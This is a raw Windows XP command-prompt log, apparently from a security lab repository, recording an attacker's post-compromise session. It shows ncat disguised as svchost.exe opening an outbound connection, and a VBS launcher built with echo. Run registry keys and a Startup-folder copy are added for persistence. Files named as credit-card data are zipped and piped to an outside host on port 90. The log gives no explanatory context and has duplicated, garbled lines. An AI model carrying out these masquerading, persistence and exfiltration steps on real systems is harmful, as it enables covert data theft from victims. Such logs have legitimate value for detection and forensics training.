-
Notifications
You must be signed in to change notification settings - Fork 19
/
SUWtHEh-XP.txt
362 lines (291 loc) · 14.3 KB
/
SUWtHEh-XP.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system>
C:\WINDOWS\system>C:\Users\SecurityNik\Downloads>svchost.exe 10.0.0.102 80 --nodns --ssl -4
C:\WINDOWS\system>echo > SUWtHEh_XP_ncat.vbs
echo > SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>dir SUWtHEh_XP_ncat.vbs
dir SUWtHEh_XP_ncat.vbs
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:01 AM 13 SUWtHEh_XP_ncat.vbs
1 File(s) 13 bytes
0 Dir(s) 6,713,962,496 bytes free
C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>type C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
type C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>
C:\WINDOWS\system>C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>
C:\WINDOWS\system>C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>
C:\WINDOWS\system>C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>type SUWtHEh_XP_ncat.vbs
type SUWtHEh_XP_ncat.vbs
ECHO is on.
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0
Set WShell = Nothing
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0
Set WShell = Nothing
C:\WINDOWS\system>del SUWtHEh_XP_ncat.vbs
del SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>reg add HKLM\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
The operation completed successfully
C:\WINDOWS\system>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
VBoxTray REG_SZ C:\WINDOWS\system32\VBoxTray.exe
SUWtHEh_XP_ncat REG_SZ wscript c:\windows\system\SUWtHEh-XP.vbs
C:\WINDOWS\system>reg add HKCU\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
Value SUWtHEh_XP_ncat exists, overwrite(Y/N)? Y
The operation completed successfully
C:\WINDOWS\system>reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
! REG.EXE VERSION 3.0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
SUWtHEh_XP_ncat REG_SZ wscript c:\windows\system\SUWtHEh-XP.vbs
C:\WINDOWS\system>C:\WINDOWS\system>copy SUWtHEh-XP.vbs "c:\Documents and Setti
C:\WINDOWS\system>copy SUWtHEh-XP.vbs "c:\Documents and Setti
C:\WINDOWS\system>copy SUWtHEh-XP.vbs "c:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
copy SUWtHEh-XP.vbs "c:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
1 file(s) copied.
C:\WINDOWS\system>dir c:\
dir c:\
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of c:\
03/11/2018 03:40 AM <DIR> ARCHIVED-FILES
12/30/2017 01:36 PM 0 AUTOEXEC.BAT
12/30/2017 01:36 PM 0 CONFIG.SYS
01/08/2018 12:31 AM <DIR> Dev-Cpp
03/11/2018 02:59 AM <DIR> Documents and Settings
02/02/2018 03:16 AM <DIR> Inetpub
01/27/2018 06:06 PM <DIR> MySymbols
01/04/2018 04:01 AM <DIR> New Folder
03/09/2018 03:04 AM <DIR> Program Files
01/04/2018 03:47 AM <DIR> Python27
01/22/2018 02:57 AM 223 sc.txt
01/09/2018 03:12 AM <DIR> TEST-FTP
03/11/2018 06:16 PM <DIR> tmp
03/12/2018 02:14 AM <DIR> WINDOWS
3 File(s) 223 bytes
11 Dir(s) 6,712,721,408 bytes free
C:\WINDOWS\system>dir c:\archived-files\
dir c:\archived-files\
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of c:\archived-files
03/11/2018 03:40 AM <DIR> .
03/11/2018 03:40 AM <DIR> ..
03/04/2018 02:09 AM 1,045,970 1-MB-Test.docx
03/04/2018 02:10 AM 10,723,331 10-MB-Test.docx
03/04/2018 02:09 AM 10,471,397 10-MB-Test.xlsx
03/11/2018 03:40 AM <DIR> BIO-DATA
03/04/2018 02:01 AM 4,748 Credit-Card-data.csv
03/04/2018 02:02 AM 183,081 Credit-Card-data.pdf
03/04/2018 02:02 AM 33,792 Credit-Card-data.xls
03/04/2018 02:07 AM 219,783 data1.xlsx
03/11/2018 03:40 AM <DIR> HISTORICAL-DATA
7 File(s) 22,682,102 bytes
4 Dir(s) 6,712,721,408 bytes free
C:\WINDOWS\system>7za.exe a -y -r -tzip -p XP-data.zip c:\ARCHIVED-FILES\*
7za.exe a -y -r -tzip -p XP-data.zip c:\ARCHIVED-FILES\*
7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
Scanning
Creating archive XP-data.zip
Enter password (will not be echoed):Testing1
Compressing 1-MB-Test.docx
Compressing 10-MB-Test.docx
Compressing 10-MB-Test.xlsx
Compressing Credit-Card-data.csv
Compressing Credit-Card-data.pdf
Compressing Credit-Card-data.xls
Compressing data1.xlsx
Everything is Ok
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.2 90 < c:\tmp\XP-data.zip
svchost --nodns --verbose 172.16.1.2 90 < c:\tmp\XP-data.zip
C:\WINDOWS\system>[A[B
[A[B
C:\WINDOWS\system>dir
dir
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM <DIR> .
03/12/2018 03:18 AM <DIR> ..
03/12/2018 03:16 AM 587,776 7za.exe
04/14/2008 08:00 AM 69,584 AVICAP.DLL
04/14/2008 08:00 AM 109,456 AVIFILE.DLL
04/14/2008 08:00 AM 32,816 COMMDLG.DLL
03/12/2018 03:14 AM 0 copy
03/12/1997 12:00 AM 194,736 JSCRPT16.DLL
04/14/2008 08:00 AM 2,000 KEYBOARD.DRV
04/14/2008 08:00 AM 9,936 LZEXPAND.DLL
04/14/2008 08:00 AM 73,376 MCIAVI.DRV
04/14/2008 08:00 AM 25,264 MCISEQ.DRV
04/14/2008 08:00 AM 28,160 MCIWAVE.DRV
04/14/2008 08:00 AM 68,768 MMSYSTEM.DLL
04/14/2008 08:00 AM 1,152 MMTASK.TSK
04/14/2008 08:00 AM 2,032 MOUSE.DRV
04/14/2008 08:00 AM 126,912 MSVIDEO.DLL
04/14/2008 08:00 AM 82,944 OLECLI.DLL
04/14/2008 08:00 AM 24,064 OLESVR.DLL
03/12/1997 12:00 AM 141,456 SCHNL16.DLL
04/14/2008 08:00 AM 59,167 setup.inf
04/14/2008 08:00 AM 5,120 SHELL.DLL
04/14/2008 08:00 AM 1,744 SOUND.DRV
04/14/2008 08:00 AM 5,532 stdole.tlb
03/11/2018 04:39 PM 43 SUtype
03/12/2018 03:07 AM 173 SUWtHEh-XP.vbs
03/12/2018 02:23 AM 43 SUWtHEh.bat
03/12/2018 02:21 AM 1,667,584 svchost.exe
04/14/2008 08:00 AM 3,360 SYSTEM.DRV
04/14/2008 08:00 AM 19,200 TAPI.DLL
04/14/2008 08:00 AM 4,048 TIMER.DRV
04/14/2008 08:00 AM 9,008 VER.DLL
04/14/2008 08:00 AM 2,176 VGA.DRV
04/14/2008 08:00 AM 13,600 WFWNET.DRV
04/14/2008 08:00 AM 146,432 WINSPOOL.DRV
03/12/2018 03:18 AM 19,640,434 XP-data.zip
34 File(s) 23,158,096 bytes
2 Dir(s) 6,693,003,264 bytes free
C:\WINDOWS\system>dir XP*.*
dir XP*.*
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM 19,640,434 XP-data.zip
1 File(s) 19,640,434 bytes
0 Dir(s) 6,693,003,264 bytes free
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
C:\WINDOWS\system>
C:\WINDOWS\system>dir
dir
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM <DIR> .
03/12/2018 03:18 AM <DIR> ..
03/12/2018 03:16 AM 587,776 7za.exe
04/14/2008 08:00 AM 69,584 AVICAP.DLL
04/14/2008 08:00 AM 109,456 AVIFILE.DLL
04/14/2008 08:00 AM 32,816 COMMDLG.DLL
03/12/2018 03:14 AM 0 copy
03/12/1997 12:00 AM 194,736 JSCRPT16.DLL
04/14/2008 08:00 AM 2,000 KEYBOARD.DRV
04/14/2008 08:00 AM 9,936 LZEXPAND.DLL
04/14/2008 08:00 AM 73,376 MCIAVI.DRV
04/14/2008 08:00 AM 25,264 MCISEQ.DRV
04/14/2008 08:00 AM 28,160 MCIWAVE.DRV
04/14/2008 08:00 AM 68,768 MMSYSTEM.DLL
04/14/2008 08:00 AM 1,152 MMTASK.TSK
04/14/2008 08:00 AM 2,032 MOUSE.DRV
04/14/2008 08:00 AM 126,912 MSVIDEO.DLL
04/14/2008 08:00 AM 82,944 OLECLI.DLL
04/14/2008 08:00 AM 24,064 OLESVR.DLL
03/12/1997 12:00 AM 141,456 SCHNL16.DLL
04/14/2008 08:00 AM 59,167 setup.inf
04/14/2008 08:00 AM 5,120 SHELL.DLL
04/14/2008 08:00 AM 1,744 SOUND.DRV
04/14/2008 08:00 AM 5,532 stdole.tlb
03/11/2018 04:39 PM 43 SUtype
03/12/2018 03:07 AM 173 SUWtHEh-XP.vbs
03/12/2018 02:23 AM 43 SUWtHEh.bat
03/12/2018 02:21 AM 1,667,584 svchost.exe
04/14/2008 08:00 AM 3,360 SYSTEM.DRV
04/14/2008 08:00 AM 19,200 TAPI.DLL
04/14/2008 08:00 AM 4,048 TIMER.DRV
04/14/2008 08:00 AM 9,008 VER.DLL
04/14/2008 08:00 AM 2,176 VGA.DRV
04/14/2008 08:00 AM 13,600 WFWNET.DRV
04/14/2008 08:00 AM 146,432 WINSPOOL.DRV
03/12/2018 03:18 AM 19,640,434 XP-data.zip
34 File(s) 23,158,096 bytes
2 Dir(s) 6,692,737,024 bytes free
C:\WINDOWS\system>dir
dir
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM <DIR> .
03/12/2018 03:18 AM <DIR> ..
03/12/2018 03:16 AM 587,776 7za.exe
04/14/2008 08:00 AM 69,584 AVICAP.DLL
04/14/2008 08:00 AM 109,456 AVIFILE.DLL
04/14/2008 08:00 AM 32,816 COMMDLG.DLL
03/12/2018 03:14 AM 0 copy
03/12/1997 12:00 AM 194,736 JSCRPT16.DLL
04/14/2008 08:00 AM 2,000 KEYBOARD.DRV
04/14/2008 08:00 AM 9,936 LZEXPAND.DLL
04/14/2008 08:00 AM 73,376 MCIAVI.DRV
04/14/2008 08:00 AM 25,264 MCISEQ.DRV
04/14/2008 08:00 AM 28,160 MCIWAVE.DRV
04/14/2008 08:00 AM 68,768 MMSYSTEM.DLL
04/14/2008 08:00 AM 1,152 MMTASK.TSK
04/14/2008 08:00 AM 2,032 MOUSE.DRV
04/14/2008 08:00 AM 126,912 MSVIDEO.DLL
04/14/2008 08:00 AM 82,944 OLECLI.DLL
04/14/2008 08:00 AM 24,064 OLESVR.DLL
03/12/1997 12:00 AM 141,456 SCHNL16.DLL
04/14/2008 08:00 AM 59,167 setup.inf
04/14/2008 08:00 AM 5,120 SHELL.DLL
04/14/2008 08:00 AM 1,744 SOUND.DRV
04/14/2008 08:00 AM 5,532 stdole.tlb
03/11/2018 04:39 PM 43 SUtype
03/12/2018 03:07 AM 173 SUWtHEh-XP.vbs
03/12/2018 02:23 AM 43 SUWtHEh.bat
03/12/2018 02:21 AM 1,667,584 svchost.exe
04/14/2008 08:00 AM 3,360 SYSTEM.DRV
04/14/2008 08:00 AM 19,200 TAPI.DLL
04/14/2008 08:00 AM 4,048 TIMER.DRV
04/14/2008 08:00 AM 9,008 VER.DLL
04/14/2008 08:00 AM 2,176 VGA.DRV
04/14/2008 08:00 AM 13,600 WFWNET.DRV
04/14/2008 08:00 AM 146,432 WINSPOOL.DRV
03/12/2018 03:18 AM 19,640,434 XP-data.zip
34 File(s) 23,158,096 bytes
2 Dir(s) 6,692,671,488 bytes free
C:\WINDOWS\system>dir XP*.*
dir XP*.*
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM 19,640,434 XP-data.zip
1 File(s) 19,640,434 bytes
0 Dir(s) 6,692,671,488 bytes free
C:\WINDOWS\system>svchost --nodns --verbose --listen 172.16.1.1 90 < XP-data.zip
svchost --nodns --verbose --listen 172.16.1.1 90 < XP-data.zip
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.1 90 < XP-data.zip
svchost --nodns --verbose 172.16.1.1 90 < XP-data.zip
C:\WINDOWS\system>svchost.exe --nodns --verbose 172.16.1.1 90 < XP-data.zip
svchost.exe --nodns --verbose 172.16.1.1 90 < XP-data.zip
C:\WINDOWS\system>